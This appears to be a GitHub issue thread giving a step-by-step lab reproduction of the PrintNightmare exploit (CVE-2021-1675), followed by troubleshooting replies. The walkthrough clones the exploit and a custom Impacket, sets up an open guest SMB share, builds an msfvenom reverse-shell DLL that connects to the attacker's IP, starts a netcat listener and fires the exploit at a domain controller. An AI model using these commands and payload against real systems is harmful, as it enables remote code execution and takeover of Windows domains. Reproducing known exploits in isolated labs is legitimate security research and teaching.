How to Reproduce (Virtual Environment):

Question

How to Reproduce (Virtual Environment):

BlackSnufkin opened this issue 3 years ago · 13 comments

BlackSnufkin commented 3 years ago

This is how I was able to reproduce the exploit in a virtual environment:

The best practice is to create Python virtual Environment
- python3 -m venv PrintNightmare
- source PrintNightmare/bin/activate

clone the repo and install the custom Impacket version:

git clone https://github.com/cube0x0/CVE-2021-1675.git
git clone https://github.com/cube0x0/impacket
cd impacket
python3 ./setup.py install

Set up SMB share

copy the original smb.conf file and create a backup file
cp /etc/samba/smb.conf /etc/samba/smb.conf.bak
now on the smb.conf change to this new configuration File

[global]
map to guest = Bad User
server role = standalone server
usershare allow guests = yes
idmap config * : backend = tdb
smb ports = 445

[smb]
comment = Samba
path = /tmp/
guest ok = yes
read only = no
browsable = yes
force user = nobody

Spin up SMB share:

impacket-smbserver smb /tmp/

In case you have some problems with the SMB try to use build-in SMBD service
service smbd start

Payload Creation:

Create Reverse shell Payload as a DLL

msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=<YOUR IP> LPORT=<PORT TO LISTEN> -f dll -o /tmp/rev.dll

Windows Environment:

you need to create a dc with an active directory.
create a low privilege user
create a windows 10 as the client join him in the domain
login into the win10 with the new user

Set up a listener

nc -lnvp 9001

Run the Exploit

python3 CVE-2021-1675.py <FQDN>/<USER_Name>:<PASSWORD>@<DC IP> '\\<ATTACKER_IP>\smb\rev.dll'

ENJOY your SHELL =)

Machines:

Attacker: kali Linux
DC: Server 2016
Client: win10

Answer 1 · 2021-07-03T07:15:54.000Z

Hello,i do what you told.But it always show Connection Failed,what can i do...

Answer 2 · 2021-07-03T07:17:27.000Z

Shell i reboot all machine?

Answer 3 · 2021-07-03T07:20:35.000Z

sometimes the spools service get crashed make sure that the service is running you can use rpcdump to verify

Answer 4 · 2021-07-03T07:23:09.000Z

DC and Client all need to be make sure?

Answer 5 · 2021-07-03T07:27:30.000Z

But it all show

Answer 6 · 2021-07-03T07:31:00.000Z

interesting try to check manually on the DC,
if still having problems just reboot

Answer 7 · 2021-07-03T07:34:09.000Z

I use Server 2012 as DC,will it cause problems?

Answer 8 · 2021-07-03T07:37:46.000Z

basically no but if remember right I saw someone on Twitter claiming he had problems with that version

Answer 9 · 2021-07-03T07:43:13.000Z

OK,i will use your config.Thank you very mach, hope i can fix that before dinner.I have work for it 2days...(;´༎ຶД༎ຶ`)

Answer 10 · 2021-07-03T07:44:48.000Z

😄 it all good it took me 4 days until I was able to reproduce just try harder 😉

Answer 11 · 2021-07-03T12:44:43.000Z

server 2012 r2 (dc) will failed with normal user

Answer 12 · 2021-07-14T20:57:04.000Z

I think this issue is because of the hard coded shebang (e.g. - #!/usr/bin/python3)

Changing to #!/usr/bin/env python3 solved the issue for me.

Answer 13 · 2021-08-19T20:33:25.000Z

Thank you, my using the payload windows/shell_reverse_tcp fails. Using the payload you suggest, windows/x64/shell_reverse_tcp is successful.